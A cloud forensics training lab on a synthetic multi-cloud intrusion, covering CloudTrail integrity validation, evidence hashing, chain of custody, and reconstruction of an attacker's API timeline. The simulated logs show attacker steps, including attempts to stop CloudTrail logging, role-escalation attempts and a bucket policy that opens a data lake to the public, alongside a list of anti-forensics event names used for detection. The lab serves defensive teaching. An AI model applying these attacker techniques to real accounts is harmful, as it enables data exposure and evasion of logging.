Lab 24: Cloud DFIR & Evidence Collection¶
Chapters: 20 (Cloud Attack & Defense), 27 (Digital Forensics), 28 (Advanced Incident Response)
Difficulty: Expert
Estimated Time: 8-10 hours
Prerequisites: Chapters 9, 20, 27, and 28; familiarity with AWS CLI, Azure CLI, and cloud IAM concepts
Overview¶
In this lab you will:
- Perform AWS CloudTrail and CloudWatch forensic acquisition -- preserving log integrity, reconstructing attacker timelines from API calls, analyzing IAM credential reports, and documenting evidence chain of custody
- Execute AWS EC2 instance forensic acquisition -- creating EBS snapshots for evidence preservation, acquiring volatile memory using SSM Run Command with LiME/AVML, mounting disk images read-only, and analyzing VPC Flow Logs and S3 access logs for data exfiltration indicators
- Investigate Azure Activity Logs and Microsoft Sentinel -- exporting audit telemetry, hunting for compromise indicators with KQL, detecting Managed Identity and Service Principal abuse, and auditing Key Vault access patterns
- Conduct Azure VM disk forensics and network evidence collection -- snapshotting and exporting OS disks for offline analysis, analyzing NSG Flow Logs, investigating Azure Storage account access, and collecting container logs from ACI/AKS
- Coordinate cross-cloud incident response -- merging AWS and Azure timelines, executing legal hold procedures, building chain of custody documentation, writing forensic reports, preserving evidence for law enforcement, and detecting anti-forensics techniques
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) reserved ranges. All domains use *.example.com. All AWS account IDs use 123456789012. All Azure subscription and tenant IDs are synthetic. All credentials are testuser/REDACTED. All resource IDs, ARNs, and object IDs are completely fictitious. This lab is for defensive education only.
Scenario¶
Incident Brief -- Quantum Financial Services
Organization: Quantum Financial Services (fictional)
Industry: Financial technology -- 3,200 employees, multi-cloud infrastructure
AWS Account ID: 123456789012 (SYNTHETIC)
Azure Tenant ID: a1b2c3d4-e5f6-7890-abcd-ef1234567890 (SYNTHETIC)
Azure Subscription ID: 12345678-abcd-ef01-2345-678901234567 (SYNTHETIC)
Primary Domain: quantumfinancial.example.com (SYNTHETIC)
Cloud Infrastructure:
| Cloud | Environment | Region | Description |
|---|---|---|---|
| AWS | Production | us-east-1 | Core banking APIs, transaction processing |
| AWS | Staging | us-west-2 | Pre-production testing environment |
| Azure | Production | East US | Identity services (Entra ID), compliance workloads |
| Azure | Analytics | West US 2 | Data warehouse, ML pipelines |
AWS Network Topology:
| VPC | CIDR | Description |
|---|---|---|
| vpc-prod-0a1b2c3d | 10.100.0.0/16 | Production VPC |
| vpc-staging-4e5f6a7b | 10.200.0.0/16 | Staging VPC |
| vpc-mgmt-8c9d0e1f | 10.50.0.0/16 | Management/bastion VPC |
| Subnet | CIDR | AZ | Description |
|---|---|---|---|
| subnet-prod-web | 10.100.1.0/24 | us-east-1a | Production web tier |
| subnet-prod-app | 10.100.2.0/24 | us-east-1b | Production application tier |
| subnet-prod-db | 10.100.3.0/24 | us-east-1c | Production database tier |
| subnet-mgmt-bastion | 10.50.1.0/24 | us-east-1a | Bastion hosts |
Azure Network Topology:
| VNet | Address Space | Description |
|---|---|---|
| vnet-identity-prod | 10.150.0.0/16 | Identity and compliance workloads |
| vnet-analytics | 10.160.0.0/16 | Data analytics platform |
| Subnet | CIDR | Description |
|---|---|---|
| snet-identity | 10.150.1.0/24 | Entra ID Connect, ADFS |
| snet-compliance | 10.150.2.0/24 | Compliance scanning VMs |
| snet-analytics-compute | 10.160.1.0/24 | Spark/Databricks workers |
| snet-analytics-storage | 10.160.2.0/24 | Storage endpoints |
Key Assets:
| Resource | Identifier | Cloud | Description |
|---|---|---|---|
| API Gateway | i-0a1b2c3d4e5f6789a | AWS | Production banking API server |
| Transaction Processor | i-0b2c3d4e5f6789ab0 | AWS | Core transaction engine |
| Database Primary | qfs-prod-postgres-01 | AWS | PostgreSQL primary (RDS DB instance) |
| Bastion Host | i-0d4e5f67890abcd12 | AWS | Management SSH bastion |
| S3 Data Lake | s3://qfs-datalake-prod-123456789012 | AWS | Customer data lake |
| S3 CloudTrail | s3://qfs-cloudtrail-123456789012 | AWS | CloudTrail log bucket |
| Identity Server | vm-identity-prod-01 | Azure | Entra ID Connect sync |
| Compliance Scanner | vm-compliance-01 | Azure | CIS benchmark scanner |
| Key Vault | kv-qfs-prod-eastus | Azure | Production secrets vault |
| Storage Account | stqfsanalyticswestus2 | Azure | Analytics data storage |
| AKS Cluster | aks-qfs-analytics | Azure | Kubernetes analytics workloads |
Incident Summary: On 2026-03-24 at 14:32 UTC, Quantum Financial Services' SOC received an automated alert from GuardDuty indicating unusual API calls from an IAM user account (dev-jenkins-ci) that was making DescribeInstances, GetCallerIdentity, and ListBuckets calls from an IP address (203.0.113.42 -- SYNTHETIC) not associated with any known CI/CD infrastructure. Concurrently, Azure Sentinel flagged a Managed Identity (mi-compliance-scanner) performing anomalous Key Vault secret reads at 14:38 UTC. Preliminary triage suggests a coordinated multi-cloud intrusion -- the attacker may have compromised CI/CD credentials and pivoted across cloud boundaries. The CISO has authorized a full DFIR investigation with evidence preservation for potential law enforcement referral.
Emergency Contacts:
| Role | Name | Email |
|---|---|---|
| CISO | Sarah Chen | ciso@quantumfinancial.example.com |
| SOC Lead | Marcus Williams | soc-lead@quantumfinancial.example.com |
| Legal Counsel | David Park | legal@quantumfinancial.example.com |
| External Forensics | NexusIR Team | ir@nexusir.example.com |
All contacts, names, and email addresses are 100% SYNTHETIC.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| GIAC GCFE (Certified Forensic Examiner) | Evidence Acquisition, Chain of Custody, Cloud Artifact Analysis |
| GIAC GCFA (Certified Forensic Analyst) | Advanced Forensic Analysis, Timeline Analysis, Cloud Forensics |
| GIAC GCFR (Cloud Forensics Responder) | Cloud Evidence Collection, AWS/Azure Forensics, Cross-Cloud IR |
| CompTIA CySA+ (CS0-003) | Domain 1: Security Operations (33%), Domain 3: Incident Response and Management (20%) |
| CompTIA CASP+ (CAS-004) | Domain 1: Security Architecture (29%), Domain 2: Security Operations (30%) |
| AWS Security Specialty (SCS-C02) | Domain 3: Infrastructure Security, Domain 4: Identity & Access Management, Domain 5: Data Protection |
| Azure Security Engineer Associate (AZ-500) | Manage Security Operations, Secure Data and Applications, Manage Identity and Access |
| SC-200 (Microsoft Security Operations Analyst) | KQL Detection, Sentinel Analytics, Incident Investigation |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| AWS CLI | AWS API interaction and evidence collection | 2.15+ |
| Azure CLI (az) | Azure resource management and log export | 2.58+ |
| jq | JSON parsing and log analysis | 1.7+ |
| volatility3 | Memory forensics analysis framework | 2.5+ |
| AVML | Azure/Linux volatile memory acquisition | 0.14+ |
| LiME | Linux Memory Extractor kernel module | Latest |
| sleuthkit (mmls, fls, icat) | Disk forensics and filesystem analysis | 4.12+ |
| plaso (log2timeline) | Super-timeline generation | 20240301+ |
| Python 3 | Scripting, timeline correlation, evidence processing | 3.10+ |
| PowerShell | Azure automation and analysis scripts | 7.4+ |
| dd / dcfldd | Raw disk imaging | Latest |
| sha256sum / hashdeep | Evidence integrity hashing | Latest |
| gzip / pigz | Evidence compression | Latest |
Test Accounts (Synthetic)¶
| Cloud | Account/Identity | Type | Notes |
|---|---|---|---|
| AWS | dev-jenkins-ci | IAM User | Compromised CI/CD service account |
| AWS | admin-forensics | IAM User | Forensic investigator role |
| AWS | qfs-incident-response | IAM Role | Cross-account IR role |
| Azure | mi-compliance-scanner | Managed Identity | Compromised managed identity |
| Azure | sp-devops-pipeline | Service Principal | Suspicious activity detected |
| Azure | forensic-analyst@quantumfinancial.example.com | User | Forensic investigator |
| Azure | admin@quantumfinancial.example.com | User | Global admin (break-glass) |
All accounts are 100% SYNTHETIC.
Investigator Credentials¶
# All credentials are SYNTHETIC — never use real credentials in labs
AWS Access Key ID: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Azure Username: forensic-analyst@quantumfinancial.example.com
Azure Password: REDACTED
Lab Environment Setup¶
# ============================================================
# Lab 24 Environment Setup — Cloud DFIR Evidence Collection
# All resources, accounts, and data are 100% SYNTHETIC
# ============================================================
# --- AWS CLI Configuration ---
# Configure AWS CLI with forensic investigator profile (SYNTHETIC)
$ aws configure --profile forensics
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-east-1
Default output format [None]: json
# Verify identity
$ aws sts get-caller-identity --profile forensics
{
"UserId": "AIDAIOSFODNN7EXAMPLE",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/admin-forensics"
}
# --- Azure CLI Configuration ---
# Log in to Azure with forensic analyst account (SYNTHETIC)
$ az login --tenant a1b2c3d4-e5f6-7890-abcd-ef1234567890
# Follow browser authentication prompt (SYNTHETIC)
# Verify Azure subscription
$ az account show --query '{name:name, id:id, tenantId:tenantId}' -o json
{
"name": "QFS-Production",
"id": "12345678-abcd-ef01-2345-678901234567",
"tenantId": "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
}
# --- Create forensic workspace directories ---
$ mkdir -p ~/cloud-dfir-lab24/{evidence,timeline,reports,chain-of-custody,scripts}
$ mkdir -p ~/cloud-dfir-lab24/evidence/{aws,azure}
$ mkdir -p ~/cloud-dfir-lab24/evidence/aws/{cloudtrail,flowlogs,s3-access,ebs-snapshots,memory}
$ mkdir -p ~/cloud-dfir-lab24/evidence/azure/{activity-logs,signin-logs,audit-logs,nsg-flows,disk-snapshots,keyvault-logs}
# --- Install required tools ---
$ pip install volatility3 plaso boto3 azure-identity azure-mgmt-compute azure-monitor-query
$ sudo apt-get install -y sleuthkit dcfldd hashdeep pigz
# Verify tool versions
$ aws --version
aws-cli/2.15.30 Python/3.11.8 Linux/5.15.0 source/x86_64
$ az version --query '"azure-cli"' -o tsv
2.58.0
$ vol --help 2>&1 | head -1
Volatility 3 Framework 2.5.2
$ mmls -V
The Sleuth Kit ver 4.12.1
# --- Create case metadata ---
$ cat > ~/cloud-dfir-lab24/case-metadata.json << 'CASE_EOF'
{
"case_id": "QFS-IR-2026-0042",
"case_title": "Quantum Financial Services Multi-Cloud Intrusion",
"classification": "CONFIDENTIAL",
"created_date": "2026-03-24T15:00:00Z",
"lead_investigator": "forensic-analyst@quantumfinancial.example.com",
"authorized_by": "ciso@quantumfinancial.example.com",
"incident_date": "2026-03-24T14:32:00Z",
"clouds_in_scope": ["AWS (123456789012)", "Azure (a1b2c3d4-e5f6-7890-abcd-ef1234567890)"],
"status": "Active Investigation",
"law_enforcement_referral": "Pending legal review",
"notes": "SYNTHETIC CASE — All data is fictional for training purposes"
}
CASE_EOF
echo "[+] Lab 24 environment setup complete"
echo "[+] Case ID: QFS-IR-2026-0042"
echo "[+] Working directory: ~/cloud-dfir-lab24/"
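Chain-of-custody documentation is one of the stated deliverables of this lab, and it benefits from being tamper-evident rather than a plain text file. The sketch below (a hypothetical helper, not part of any standard toolkit) links each custody entry to the hash of the previous one, so a retroactive edit anywhere in the log invalidates every later entry:

```python
import hashlib
import json

def add_custody_entry(log, action, actor, item, timestamp):
    """Append a chain-of-custody entry whose hash covers the previous
    entry's hash, making out-of-order edits detectable (sketch only)."""
    prev_hash = log[-1]["entry_hash"] if log else None
    entry = {
        "action": action,          # e.g. "acquired", "hashed", "transferred"
        "actor": actor,            # investigator identity
        "item": item,              # evidence identifier
        "timestamp": timestamp,    # ISO-8601 UTC string
        "previous_hash": prev_hash,
    }
    body = json.dumps(entry, sort_keys=True).encode()
    entry["entry_hash"] = hashlib.sha256(body).hexdigest()
    log.append(entry)
    return entry

def verify_custody_log(log):
    """Recompute every entry hash and back-link; True only if intact."""
    prev_hash = None
    for e in log:
        if e["previous_hash"] != prev_hash:
            return False
        body = {k: v for k, v in e.items() if k != "entry_hash"}
        digest = hashlib.sha256(
            json.dumps(body, sort_keys=True).encode()
        ).hexdigest()
        if digest != e["entry_hash"]:
            return False
        prev_hash = e["entry_hash"]
    return True
```

In practice each acquisition step in the exercises below would append one entry; `verify_custody_log` can be re-run at every evidence hand-off.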
No Cloud Account? No Problem
You can complete this lab as a forensic methodology exercise using the inline sample data and command outputs. Read each scenario, study the commands and queries, and practice writing your own forensic documentation. The learning value is in understanding cloud DFIR procedures, evidence handling, and cross-cloud correlation techniques.
Exercise 1: AWS CloudTrail & CloudWatch Forensics¶
Exercise Objective
Acquire and analyze AWS CloudTrail logs to reconstruct the attacker's API call timeline. Validate log integrity, correlate IAM credential reports with suspicious activity, and establish a forensic chain of custody for all collected evidence.
MITRE ATT&CK Techniques:
- T1078.004 -- Valid Accounts: Cloud Accounts
- T1087.004 -- Account Discovery: Cloud Account
- T1580 -- Cloud Infrastructure Discovery
- T1530 -- Data from Cloud Storage
- T1562.008 -- Impair Defenses: Disable or Modify Cloud Logs
Scenario Context¶
Investigation Trigger
GuardDuty alert Recon:IAMUser/MaliciousIPCaller.Custom fired at 2026-03-24 14:32 UTC. The IAM user dev-jenkins-ci made API calls from 203.0.113.42 (SYNTHETIC) -- an IP not associated with any known Quantum Financial Services infrastructure. Normal CI/CD activity for this account originates exclusively from 10.50.1.10 (bastion host) and 10.100.2.50 (Jenkins server). The last legitimate use was 2026-03-22 at 09:15 UTC.
Initial Indicators:
| Indicator | Value | Type |
|---|---|---|
| Source IP | 203.0.113.42 | SYNTHETIC attacker IP |
| IAM User | dev-jenkins-ci | Compromised service account |
| First suspicious call | 2026-03-24T14:28:00Z | GetCallerIdentity |
| GuardDuty alert | 2026-03-24T14:32:00Z | Recon:IAMUser/MaliciousIPCaller.Custom |
| AWS Region | us-east-1 | Primary production region |
Step 1.1: CloudTrail Log Integrity Validation¶
Before analyzing CloudTrail logs, verify they have not been tampered with. CloudTrail log file integrity validation uses SHA-256 hashing and RSA digital signatures.
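Conceptually, CloudTrail digest files form a hash chain: each digest records the SHA-256 hashes of the log files it covers plus the hash of the previous digest file (real validation also checks an RSA signature on each digest, which this simplified sketch omits). The toy model below shows why deleting or editing a historic log file breaks every digest after it:

```python
import hashlib
import json

def digest_hash(digest):
    # Stand-in for hashing the raw digest file bytes
    return hashlib.sha256(json.dumps(digest, sort_keys=True).encode()).hexdigest()

def build_digest_chain(log_batches):
    """Build a simplified digest chain over batches of log-file hashes."""
    chain, prev = [], None
    for batch in log_batches:
        d = {"logFileHashes": batch, "previousDigestHashValue": prev}
        prev = digest_hash(d)
        chain.append(d)
    return chain

def verify_digest_chain(chain):
    """Walk the chain; any edited digest breaks its successor's back-link.
    (Real CloudTrail validation also verifies the newest digest's RSA
    signature, so even the chain tip cannot be silently rewritten.)"""
    prev = None
    for d in chain:
        if d["previousDigestHashValue"] != prev:
            return False
        prev = digest_hash(d)
    return True
```

This is the property that `aws cloudtrail validate-logs` (used next) checks for you against the delivered digest and log files.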
# ============================================================
# Step 1.1: Validate CloudTrail Log Integrity
# Ensures logs have not been modified since delivery
# ============================================================
# Check CloudTrail status — is logging enabled? (SYNTHETIC output)
$ aws cloudtrail describe-trails --profile forensics --region us-east-1
{
"trailList": [
{
"Name": "qfs-org-trail",
"S3BucketName": "qfs-cloudtrail-123456789012",
"S3KeyPrefix": "AWSLogs",
"IncludeGlobalServiceEvents": true,
"IsMultiRegionTrail": true,
"HomeRegion": "us-east-1",
"TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail",
"LogFileValidationEnabled": true,
"HasCustomEventSelectors": true,
"HasInsightSelectors": true,
"IsOrganizationTrail": false
}
]
}
# Validate CloudTrail log file integrity for the incident window
# This checks digest files against delivered log files
$ aws cloudtrail validate-logs \
--trail-arn arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail \
--start-time "2026-03-22T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
# Results requested for 2026-03-22T00:00:00Z to 2026-03-25T00:00:00Z
# Results found for 2026-03-22T00:00:00Z to 2026-03-25T00:00:00Z:
# 72/72 digest files valid
# 4,287/4,287 log files valid
# Check CloudTrail event selectors (what is being logged?)
$ aws cloudtrail get-event-selectors \
--trail-name qfs-org-trail \
--profile forensics \
--region us-east-1
{
"TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail",
"AdvancedEventSelectors": [
{
"Name": "Management events",
"FieldSelectors": [
{
"Field": "eventCategory",
"Equals": ["Management"]
}
]
},
{
"Name": "S3 data events",
"FieldSelectors": [
{
"Field": "eventCategory",
"Equals": ["Data"]
},
{
"Field": "resources.type",
"Equals": ["AWS::S3::Object"]
}
]
}
]
}
# Check if anyone modified or stopped CloudTrail recently (anti-forensics check)
$ aws cloudtrail lookup-events \
--lookup-attributes AttributeKey=EventName,AttributeValue=StopLogging \
--start-time "2026-03-20T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT — check for log tampering attempts:
{
"Events": [
{
"EventId": "a1b2c3d4-5678-90ab-cdef-111111111111",
"EventName": "StopLogging",
"ReadOnly": "false",
"EventTime": "2026-03-24T15:47:22Z",
"EventSource": "cloudtrail.amazonaws.com",
"Username": "dev-jenkins-ci",
"Resources": [
{
"ResourceType": "AWS::CloudTrail::Trail",
"ResourceName": "arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail"
}
],
"CloudTrailEvent": "{\"eventVersion\":\"1.09\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAIOSFODNN7EXAMPLEA\",\"arn\":\"arn:aws:iam::123456789012:user/dev-jenkins-ci\",\"accountId\":\"123456789012\",\"userName\":\"dev-jenkins-ci\"},\"eventTime\":\"2026-03-24T15:47:22Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"203.0.113.42\",\"userAgent\":\"aws-cli/2.15.0 Python/3.11.0 Linux/5.15.0\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-east-1:123456789012:trail/qfs-org-trail\"},\"responseElements\":null,\"errorCode\":\"AccessDenied\",\"errorMessage\":\"User: arn:aws:iam::123456789012:user/dev-jenkins-ci is not authorized to perform: cloudtrail:StopLogging\"}"
}
]
}
# FINDING: Attacker attempted to stop CloudTrail logging at 15:47 UTC
# but was denied — the account lacks cloudtrail:StopLogging permission
# This is a key anti-forensics indicator (T1562.008)
Anti-Forensics Detection
The attacker attempted to disable CloudTrail logging using the compromised dev-jenkins-ci account at 15:47 UTC. The attempt was blocked by IAM policy restrictions. This is a critical finding — document it in the timeline and forensic report. Always check for StopLogging, DeleteTrail, UpdateTrail, and PutEventSelectors events early in any cloud investigation.
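The tampering check above can be automated over the acquired records. A minimal sketch (field names follow the standard CloudTrail record schema; the event list matches the callout):

```python
# Event names that indicate attempts to tamper with CloudTrail logging
ANTI_FORENSICS_EVENTS = {"StopLogging", "DeleteTrail", "UpdateTrail",
                         "PutEventSelectors"}

def find_anti_forensics(records):
    """Return tampering-related events from a list of CloudTrail records,
    keeping only the fields a timeline entry needs."""
    return [
        {
            "time": r.get("eventTime"),
            "api": r.get("eventName"),
            "user": r.get("userIdentity", {}).get("userName"),
            "source_ip": r.get("sourceIPAddress"),
            # errorCode is absent on success, so blocked=False means it worked
            "blocked": r.get("errorCode") == "AccessDenied",
        }
        for r in records
        if r.get("eventName") in ANTI_FORENSICS_EVENTS
    ]
```

Run it against the merged per-day record arrays produced in Step 1.3; a hit with `blocked: False` means logging was actually disrupted and the affected window must be treated as incomplete.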
Step 1.2: CloudTrail Log Acquisition and Preservation¶
# ============================================================
# Step 1.2: Acquire CloudTrail Logs from S3
# Preserve original logs with integrity hashes
# ============================================================
# Define evidence collection window (72 hours around incident)
CASE_ID="QFS-IR-2026-0042"
EVIDENCE_DIR=~/cloud-dfir-lab24/evidence/aws/cloudtrail
START_DATE="2026-03-22"
END_DATE="2026-03-25"
# List CloudTrail log files in the S3 bucket for the incident window
$ aws s3 ls s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/ \
--recursive --profile forensics | head -20
# SYNTHETIC OUTPUT:
# 2026-03-22 00:05:23 45231 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/22/123456789012_CloudTrail_us-east-1_20260322T0000Z_aBcDeFgH.json.gz
# 2026-03-22 00:10:18 38472 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/22/123456789012_CloudTrail_us-east-1_20260322T0005Z_iJkLmNoP.json.gz
# ... (hundreds of log files)
# 2026-03-24 14:35:12 52841 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/24/123456789012_CloudTrail_us-east-1_20260324T1430Z_qRsTuVwX.json.gz
# 2026-03-24 14:40:08 61293 AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/24/123456789012_CloudTrail_us-east-1_20260324T1435Z_yZaBcDeF.json.gz
# Download all CloudTrail logs for the evidence window
$ aws s3 sync \
s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/ \
${EVIDENCE_DIR}/raw/ \
--profile forensics \
--exclude "*" \
--include "*/22/*" \
--include "*/23/*" \
--include "*/24/*" \
--include "*/25/*"
# SYNTHETIC: download: s3://qfs-cloudtrail-123456789012/... -> raw/... (4,287 files, 189 MB)
# Also download digest files for integrity verification
$ aws s3 sync \
s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail-Digest/us-east-1/2026/03/ \
${EVIDENCE_DIR}/digests/ \
--profile forensics \
--exclude "*" \
--include "*/22/*" \
--include "*/23/*" \
--include "*/24/*" \
--include "*/25/*"
# Generate SHA-256 hashes for all acquired evidence files
$ find ${EVIDENCE_DIR}/raw/ -name "*.json.gz" -exec sha256sum {} \; \
> ${EVIDENCE_DIR}/evidence_hashes_raw.sha256
# Hash count verification
$ wc -l ${EVIDENCE_DIR}/evidence_hashes_raw.sha256
# 4287 evidence_hashes_raw.sha256
# Create a master evidence integrity record
$ cat > ${EVIDENCE_DIR}/acquisition_record.json << 'ACQ_EOF'
{
"case_id": "QFS-IR-2026-0042",
"evidence_type": "AWS CloudTrail Logs",
"source": "s3://qfs-cloudtrail-123456789012",
"region": "us-east-1",
"acquisition_start": "2026-03-24T16:00:00Z",
"acquisition_end": "2026-03-24T16:12:00Z",
"acquired_by": "forensic-analyst@quantumfinancial.example.com",
"tool": "aws s3 sync (AWS CLI 2.15.30)",
"date_range": "2026-03-22 to 2026-03-25",
"file_count": 4287,
"total_size_bytes": 198180864,
"hash_algorithm": "SHA-256",
"hash_manifest": "evidence_hashes_raw.sha256",
"log_integrity_validation": "72/72 digest files valid, 4287/4287 log files valid",
"notes": "SYNTHETIC — Training exercise data"
}
ACQ_EOF
echo "[+] CloudTrail evidence acquisition complete"
echo "[+] Files: 4,287 | Size: 189 MB | Integrity: Validated"
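The hash manifest created above should be re-verified at every hand-off, not just at acquisition. A small hedged sketch of re-checking a `sha256sum`-style manifest; the `read_bytes` callable is an assumption introduced here so the check can run against any storage backend (local disk, an evidence vault API, a test fixture):

```python
import hashlib

def verify_hash_manifest(manifest_text, read_bytes):
    """Re-verify a sha256sum-style manifest ('<hash>  <path>' per line).
    `read_bytes(path)` must return the file's current contents as bytes.
    Returns the list of paths whose hash no longer matches."""
    mismatches = []
    for line in manifest_text.strip().splitlines():
        expected, path = line.split(maxsplit=1)
        actual = hashlib.sha256(read_bytes(path)).hexdigest()
        if actual != expected:
            mismatches.append(path)
    return mismatches
```

An empty return value is what belongs in the next chain-of-custody entry; any non-empty result means the evidence copy can no longer be relied on.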
Step 1.3: Suspicious Activity Analysis with CloudTrail¶
# ============================================================
# Step 1.3: Analyze CloudTrail for Compromised Account Activity
# Focus on dev-jenkins-ci from attacker IP 203.0.113.42
# ============================================================
# Decompress and merge CloudTrail logs for analysis
$ zcat ${EVIDENCE_DIR}/raw/24/*.json.gz | \
jq -s '[.[].Records[]] | sort_by(.eventTime)' \
> ${EVIDENCE_DIR}/cloudtrail_20260324_merged.json
# Extract all events from the compromised account
$ cat ${EVIDENCE_DIR}/cloudtrail_20260324_merged.json | \
jq '[.[] | select(.userIdentity.userName == "dev-jenkins-ci")]' \
> ${EVIDENCE_DIR}/compromised_user_events.json
# Count events from compromised account
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | jq 'length'
# 247
# Separate events by source IP to distinguish legitimate vs attacker activity
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq 'group_by(.sourceIPAddress) | .[] |
{source_ip: .[0].sourceIPAddress, event_count: length,
first_event: (.[0].eventTime), last_event: (.[-1].eventTime),
api_calls: [.[] | .eventName] | unique}' \
| jq -s '.'
# SYNTHETIC OUTPUT:
[
{
"source_ip": "10.100.2.50",
"event_count": 12,
"first_event": "2026-03-24T09:15:22Z",
"last_event": "2026-03-24T09:48:33Z",
"api_calls": [
"DescribeInstances",
"GetObject",
"PutObject"
]
},
{
"source_ip": "203.0.113.42",
"event_count": 235,
"first_event": "2026-03-24T14:28:11Z",
"last_event": "2026-03-24T18:22:05Z",
"api_calls": [
"AssumeRole",
"CreateAccessKey",
"CreateKeyPair",
"DeleteTrail",
"DescribeInstances",
"DescribeSecurityGroups",
"DescribeSubnets",
"DescribeVolumes",
"DescribeVpcs",
"GetBucketAcl",
"GetBucketPolicy",
"GetCallerIdentity",
"GetObject",
"GetSecretValue",
"ListAccessKeys",
"ListAttachedUserPolicies",
"ListBuckets",
"ListGroupsForUser",
"ListRoles",
"ListSecrets",
"ListUsers",
"PutBucketPolicy",
"RunInstances",
"StopLogging"
]
}
]
# Build the attacker timeline from 203.0.113.42
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq '[.[] | select(.sourceIPAddress == "203.0.113.42") |
{time: .eventTime, api: .eventName, source: .eventSource,
error: .errorCode, region: .awsRegion,
params: (.requestParameters | tostring | .[0:200])}]' \
> ${EVIDENCE_DIR}/attacker_timeline_aws.json
# Display the first 20 attacker API calls (reconnaissance phase)
$ cat ${EVIDENCE_DIR}/attacker_timeline_aws.json | \
jq '.[:20] | .[] | "\(.time) | \(.api) | \(.source) | \(.error // "SUCCESS")"' -r
# SYNTHETIC OUTPUT — Attacker Reconnaissance Timeline:
# 2026-03-24T14:28:11Z | GetCallerIdentity | sts.amazonaws.com | SUCCESS
# 2026-03-24T14:28:15Z | ListAttachedUserPolicies | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:28:18Z | ListGroupsForUser | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:28:22Z | ListAccessKeys | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:29:01Z | ListUsers | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:29:35Z | ListRoles | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:30:12Z | DescribeInstances | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:30:45Z | DescribeVpcs | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:30:58Z | DescribeSubnets | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:31:22Z | DescribeSecurityGroups | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:31:55Z | DescribeVolumes | ec2.amazonaws.com | SUCCESS
# 2026-03-24T14:32:10Z | ListBuckets | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:32:44Z | GetBucketAcl | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:33:01Z | GetBucketPolicy | s3.amazonaws.com | SUCCESS
# 2026-03-24T14:34:22Z | ListSecrets | secretsmanager.amazonaws.com | SUCCESS
# 2026-03-24T14:34:55Z | GetSecretValue | secretsmanager.amazonaws.com | SUCCESS
# 2026-03-24T14:36:12Z | CreateAccessKey | iam.amazonaws.com | SUCCESS
# 2026-03-24T14:38:00Z | AssumeRole | sts.amazonaws.com | AccessDenied
# 2026-03-24T14:38:15Z | AssumeRole | sts.amazonaws.com | AccessDenied
# 2026-03-24T14:40:22Z | RunInstances | ec2.amazonaws.com | SUCCESS
# Extract privilege escalation attempts
$ cat ${EVIDENCE_DIR}/compromised_user_events.json | \
jq '[.[] | select(.sourceIPAddress == "203.0.113.42") |
select(.eventName == "CreateAccessKey" or
.eventName == "AssumeRole" or
.eventName == "CreateKeyPair" or
.eventName == "PutBucketPolicy" or
.eventName == "CreateUser" or
.eventName == "AttachUserPolicy") |
{time: .eventTime, api: .eventName, error: .errorCode,
details: .requestParameters}]'
# SYNTHETIC OUTPUT — Privilege Escalation Events:
[
{
"time": "2026-03-24T14:36:12Z",
"api": "CreateAccessKey",
"error": null,
"details": {
"userName": "dev-jenkins-ci"
}
},
{
"time": "2026-03-24T14:38:00Z",
"api": "AssumeRole",
"error": "AccessDenied",
"details": {
"roleArn": "arn:aws:iam::123456789012:role/AdminFullAccess",
"roleSessionName": "escalation-attempt"
}
},
{
"time": "2026-03-24T14:38:15Z",
"api": "AssumeRole",
"error": "AccessDenied",
"details": {
"roleArn": "arn:aws:iam::123456789012:role/DatabaseAdmin",
"roleSessionName": "escalation-attempt-2"
}
},
{
"time": "2026-03-24T15:02:33Z",
"api": "PutBucketPolicy",
"error": null,
"details": {
"bucketName": "qfs-datalake-prod-123456789012",
"policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::qfs-datalake-prod-123456789012/*\"}]}"
}
}
]
# CRITICAL FINDING: Attacker made the data lake bucket publicly accessible
# via PutBucketPolicy at 15:02:33Z — this is a data exfiltration preparation step
